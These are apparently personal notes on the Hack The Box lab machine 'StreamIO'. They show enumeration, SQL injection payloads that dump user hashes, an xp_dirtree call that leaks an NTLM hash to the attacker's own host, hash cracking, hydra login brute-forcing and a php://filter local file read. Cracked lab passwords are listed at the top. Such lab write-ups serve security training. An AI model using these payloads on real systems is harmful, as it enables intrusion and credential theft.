HTB StreamIO done
StreamIO¶
OS:¶
Windows
Technology:¶
IP Address:¶
10.10.11.158
Open ports:¶
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 20:34:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
Users and pass:¶
Find on the website: https://streamio.htb/about.php
barry
oliver
samantha
---
From database table
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
pentester:qwerty123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
---
After bruteforce login with hydra
L: yoshihide
P: 66boysandgirls..
---
After read all config file in path: C:\inetpub\*.php
db_admin
B1@hx31234567890
___
db_user
B1@hB1@hB1@h
---
From backup database
nikk37
[email protected]
yoshihide
66boysandgirls..
Lauren
##123a8j8w5123##
Sabrina
!!sabrina$
---
From firefox db's
admin
JDg0dd1s@d0p3cr3@t0r
nikk37
n1kk1sd0p3t00
yoshihide
paddpadd@12
JDgodd
password@12
Nmap¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.158_nmap 10.10.11.158 ; cat 10.10.11.158_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 15:30 CEST
Nmap scan report for 10.10.11.158
Host is up (0.046s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 20:34:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2024-04-03T20:36:09+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_http-title: Not Found
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
Add hostname to /etc/hosts¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat /etc/hosts | grep stream
10.10.11.158 streamIO.htb watch.streamIO.htb
Ffuz - subdomain: https://10.10.11.158¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ffuf -u https://10.10.11.158 -H "Host: FUZZ.streamio.htb " -w /usr/share/wordlists/dirb/big.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://10.10.11.158
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.streamio.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
watch [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 54ms]
:: Progress: [20469/20469] :: Job [1/1] :: 131 req/sec :: Duration: [0:02:27] :: Errors: 0 ::
Ffuz - https://streamio.htb¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ffuf -u https://streamio.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o streamio.htb_443_ffuz -of all -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://streamio.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php
:: Output file : streamio.htb_443_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ADMIN [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 51ms]
[INFO] Adding a new job to the queue: https://streamio.htb/ADMIN/FUZZ
Admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 49ms]
[INFO] Adding a new job to the queue: https://streamio.htb/Admin/FUZZ
About.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 50ms]
Contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 54ms]
Images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 44ms]
[INFO] Adding a new job to the queue: https://streamio.htb/Images/FUZZ
Index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 45ms]
Login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 83ms]
about.php [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 42ms]
admin [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 41ms]
[INFO] Adding a new job to the queue: https://streamio.htb/admin/FUZZ
contact.php [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 59ms]
css [Status: 301, Size: 148, Words: 9, Lines: 2, Duration: 61ms]
[INFO] Adding a new job to the queue: https://streamio.htb/css/FUZZ
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 52ms]
fonts [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 39ms]
[INFO] Adding a new job to the queue: https://streamio.htb/fonts/FUZZ
images [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 50ms]
[INFO] Adding a new job to the queue: https://streamio.htb/images/FUZZ
index.php [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 56ms]
js [Status: 301, Size: 147, Words: 9, Lines: 2, Duration: 74ms]
[INFO] Adding a new job to the queue: https://streamio.htb/js/FUZZ
login.php [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 65ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 49ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 44ms]
[INFO] Starting queued job on target: https://streamio.htb/ADMIN/FUZZ
Images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 46ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/Images/
Index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 53ms]
css [Status: 301, Size: 154, Words: 9, Lines: 2, Duration: 39ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/css/
fonts [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/fonts/
images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 40ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/images/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 42ms]
js [Status: 301, Size: 153, Words: 9, Lines: 2, Duration: 41ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/ADMIN/js/
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 86ms]
[INFO] Starting queued job on target: https://streamio.htb/Admin/FUZZ
Images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 60ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/Images/
Index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 60ms]
css [Status: 301, Size: 154, Words: 9, Lines: 2, Duration: 63ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/css/
fonts [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 55ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/fonts/
images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 84ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/images/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 126ms]
js [Status: 301, Size: 153, Words: 9, Lines: 2, Duration: 126ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/Admin/js/
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 54ms]
[INFO] Starting queued job on target: https://streamio.htb/Images/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/admin/FUZZ
Index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 53ms]
Images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/Images/
css [Status: 301, Size: 154, Words: 9, Lines: 2, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/css/
fonts [Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 53ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/fonts/
images [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/images/
index.php [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 43ms]
js [Status: 301, Size: 153, Words: 9, Lines: 2, Duration: 67ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://streamio.htb/admin/js/
master.php [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 49ms]
[INFO] Starting queued job on target: https://streamio.htb/css/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/fonts/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/images/FUZZ
[INFO] Starting queued job on target: https://streamio.htb/js/FUZZ
:: Progress: [40938/40938] :: Job [9/9] :: 634 req/sec :: Duration: [0:01:21] :: Errors: 0 ::
Open website: https://streamio.htb/about.php¶
We found list of user on the website: https://streamio.htb/about.php
Username:
barry
oliver
samantha
Ffuz - https://watch.streamio.htb¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ffuf -u https://watch.streamio.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o watch.streamio.htb_443_ffuz -of all -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://watch.streamio.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php
:: Output file : watch.streamio.htb_443_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 192ms]
Search.php [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 160ms]
blocked.php [Status: 200, Size: 677, Words: 28, Lines: 20, Duration: 74ms]
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 66ms]
index.php [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 66ms]
search.php [Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 135ms]
static [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 46ms]
[INFO] Adding a new job to the queue: https://watch.streamio.htb/static/FUZZ
[INFO] Starting queued job on target: https://watch.streamio.htb/static/FUZZ
css [Status: 301, Size: 161, Words: 9, Lines: 2, Duration: 240ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://watch.streamio.htb/static/css/
js [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 114ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: https://watch.streamio.htb/static/js/
:: Progress: [40938/40938] :: Job [2/2] :: 265 req/sec :: Duration: [0:02:54] :: Errors: 0 ::
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
Find path: https://streamio.htb/admin/¶
We found admin folder and info "FORBIDDEN"
https://streamio.htb/admin/index.php
https://streamio.htb/admin/master.php
Find path: https://streamio.htb/login.php¶
Create a new user
L: pentester
P: qwerty123
https://streamio.htb/register.php
---
Login to a new account
https://streamio.htb/login.php
but I got message "Login failed"
SQLi: https://watch.streamio.htb/search.php¶
Here we have a SQLi
---
1 List all records
Payload: %' --
---
2 SQLi with UNION
Payload: abcd' union select 1,2,3,4,5,6 --
---
3 Get DB version
Payload: abcd' union select 1,@@version,3,4,5,6 --
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor)
---
4 Get NTLM hash - rabbit hole
Payload: abcd'; use master; exec xp_dirtree '\\10.10.14.6\fake_share' --
4.1 Run responder and get NTLM hash
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ responder -I tun0 -wv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[!] Responder must be run as root.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ sudo responder -I tun0 -wv
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.6]
Responder IPv6 [dead:beef:2::1004]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-FE0QK1VXXSC]
Responder Domain Name [T6LK.LOCAL]
Responder DCE-RPC Port [48761]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.158
[SMB] NTLMv2-SSP Username : streamIO\DC$
[SMB] NTLMv2-SSP Hash : DC$::streamIO:059fb8f27d380514:E5A9095D415218B2E440ABADB2C29DC4:010100000000000080006B9A8F86DA014FD0BD88717275B90000000002000800540036004C004B0001001E00570049004E002D0046004500300051004B0031005600580058005300430004003400570049004E002D0046004500300051004B003100560058005800530043002E00540036004C004B002E004C004F00430041004C0003001400540036004C004B002E004C004F00430041004C0005001400540036004C004B002E004C004F00430041004C000700080080006B9A8F86DA01060004000200000008003000300000000000000000000000003000009A5046B50799D1BB42F017EC204919B296D4B1C408930C181749E844FB671B710A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
4.2 Cracking hash (won't cracked)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat -m 5600 streamio.hash /usr/share/wordlists/rockyou.txt -o streamio.hash_output
hashcat (v6.2.6) starting
...
...
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DC$::streamIO:059fb8f27d380514:e5a9095d415218b2e440...000000
Time.Started.....: Thu Apr 4 13:00:52 2024 (9 secs)
Time.Estimated...: Thu Apr 4 13:01:01 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1665.3 kH/s (2.21ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 69%
Started: Thu Apr 4 13:00:51 2024
Stopped: Thu Apr 4 13:01:04 2024
---
5 Enumerate Database
Payload: abcd' union select 1,name,3,4,5,6 from master..sysdatabases --
master
model
msdb
STREAMIO
streamio_backup
tempdb
---
6 List all tables from DB
Payload: abcd' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U' --
movies 885578193
users 901578250
---
7 List all columns
Payload: abcd' union select 1,name,id,4,5,6 from streamio..syscolumns where id in (901578250) --
id 901578250
is_staff 901578250
password 901578250
username 901578250
---
8 List all users and passwords
Payload: abcd' union select 1,concat(username,':',password),3,4,5,6 from users --
admin :665a50ac9eaa781e4f7f04199db97a11
Alexendra :1c2b3d8270321140e5153f6637d3ee53
Austin :0049ac57646627b8d7aeaccf8b6a936f
Barbra :3961548825e3e21df5646cafe11c6c76
Barry :54c88b2dbd7b1a84012fabc1a4c73415
Baxter :22ee218331afd081b0dcd8115284bae3
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon :35394484d89fcfdb3c5e447fe749d213
Clara :ef8f3d30a856cf166fb8215aca93e9ff
Diablo :ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield :8097cedd612cc37c29db152b6e9edbd3
Gloria :0cfaaaafb559f081df2befbe66686de0
James :c660060492d9edcaa8332d89c99c9239
Juliette :6dcd87740abb64edfa36d170f0d5450d
Lauren :08344b85b329d7efd611b7a7743e8a09
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer :7df45a9e3de3863807c026ba48e55fb3
Michelle :b83439b16f844bd6ffe35c02fe21b3c0
Oliver :fd78db29173a5cf701bd69027cb9bf6b
pentester :3fc0a7acf087f549ac2b266baf94b8b1
Robert :f03b910e2bd0313a23fdd7575f34a694
Robin :dc332fb5576e9631c9dae83f194f8e70
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5
Samantha :083ffae904143c4796e464dac33c1f7d
Stan :384463526d288edcc95fc3701e523bc7
Thane :3577c47eb1e12c8ba021611e1280753c
Theodore :925e5408ecb67aea449373d668b7359e
Victor :bf55e15b119860a6e6b5a164377da719
Victoria :b22abb47a02b52d5dfa27fb0b534f693
William :d62be0dc82071bccc1322d64ec5b6c51
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332
Cracking hashes¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hahs
admin :665a50ac9eaa781e4f7f04199db97a11
Alexendra :1c2b3d8270321140e5153f6637d3ee53
Austin :0049ac57646627b8d7aeaccf8b6a936f
Barbra :3961548825e3e21df5646cafe11c6c76
Barry :54c88b2dbd7b1a84012fabc1a4c73415
Baxter :22ee218331afd081b0dcd8115284bae3
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon :35394484d89fcfdb3c5e447fe749d213
Clara :ef8f3d30a856cf166fb8215aca93e9ff
Diablo :ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield :8097cedd612cc37c29db152b6e9edbd3
Gloria :0cfaaaafb559f081df2befbe66686de0
James :c660060492d9edcaa8332d89c99c9239
Juliette :6dcd87740abb64edfa36d170f0d5450d
Lauren :08344b85b329d7efd611b7a7743e8a09
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer :7df45a9e3de3863807c026ba48e55fb3
Michelle :b83439b16f844bd6ffe35c02fe21b3c0
Oliver :fd78db29173a5cf701bd69027cb9bf6b
pentester :3fc0a7acf087f549ac2b266baf94b8b1
Robert :f03b910e2bd0313a23fdd7575f34a694
Robin :dc332fb5576e9631c9dae83f194f8e70
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5
Samantha :083ffae904143c4796e464dac33c1f7d
Stan :384463526d288edcc95fc3701e523bc7
Thane :3577c47eb1e12c8ba021611e1280753c
Theodore :925e5408ecb67aea449373d668b7359e
Victor :bf55e15b119860a6e6b5a164377da719
Victoria :b22abb47a02b52d5dfa27fb0b534f693
William :d62be0dc82071bccc1322d64ec5b6c51
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat user_password_db.hahs /usr/share/wordlists/rockyou.txt --user -m 0 --show
admin :665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry :54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara :ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette :6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren :08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle :b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
pentester :3fc0a7acf087f549ac2b266baf94b8b1:qwerty123
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane :3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria :b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Hydra - bruteforce login to website¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hashcat user_password_db.hahs /usr/share/wordlists/rockyou.txt --user -m 0 --show | tee user_password_db.hash_output
admin :665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry :54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno :2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara :ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette :6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren :08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord :ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle :b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
pentester :3fc0a7acf087f549ac2b266baf94b8b1:qwerty123
Sabrina :f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane :3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria :b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide :b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ cat user_password_db.hash_output | cut -d: -f1,3 | tr -d " " | tee user_password_db.hash_output_hydra
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
pentester:qwerty123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ hydra -C user_password_db.hash_output_hydra streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 14:32:30
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=failed
[443][http-post-form] host: streamio.htb login: yoshihide password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 14:32:33
Login to website: https://streamio.htb/login.php¶
L: yoshihide
P: 66boysandgirls..
https://streamio.htb/login.php
---
We open next website: https://streamio.htb/admin/
We see a basic Admin panel
Find a new parametr: "debug"¶
Bruteforce parametr with wfuzz
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ wfuzz -u https://streamio.htb/admin/?FUZZ= -H "Cookie: PHPSESSID=sarnm1o7pdvrh50o5tu03rheqe" -w /usr/share/wordlists/dirb/big.txt --hh 1678
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?FUZZ=
Total requests: 20469
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005859: 200 49 L 137 W 1712 Ch "debug"
000012076: 200 10790 25878 W 320235 Ch "movie"
L
000017111: 200 398 L 916 W 12484 Ch "staff"
000018833: 200 86 L 214 W 2815 Ch "user"
Total time: 0
Processed Requests: 20469
Filtered Requests: 20465
Requests/sec.: 0
---
We put name of web like: index.php, master.php etc.
https://streamio.htb/admin/?debug=master.php
Read page master.php via php filter¶
I will use php filter to bypass and open master.php
Payload: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
___
